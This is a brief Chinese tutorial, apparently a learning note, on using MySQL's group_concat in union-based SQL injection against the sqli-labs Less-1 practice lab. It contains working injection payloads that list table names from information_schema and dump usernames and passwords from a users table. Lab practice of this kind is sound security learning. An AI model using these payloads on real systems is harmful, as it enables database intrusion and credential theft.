1.group_concat函数的作用：

        首先根据group by指定的列进行分组，将同一组的列显示出来，并且用分隔符分隔。

2.group_concat运用

        这里我使用的是sqllab-less1，通过对数据库的查询，我们发现数据库表名，列名，等数据在information_schema数据库中。

就可以通过以下语句注入

?id=-1' union select 1,2,table_name from information_schema.tables where table_schema='security'--+

 

但是这样只能回显某一个表，这时就可以使用group_concat函数把security的每一个表回显出来

 同理可以查询列名。

当库名、表名、列名都查到了之后，选择最有用的回显出来就成功的注入了。

这里我们选择users表回显出用户名username和密码password。

?id=-1' union select 1,group_concat(username,0x3e,password),3 from users--+

当然这是最简单的注入。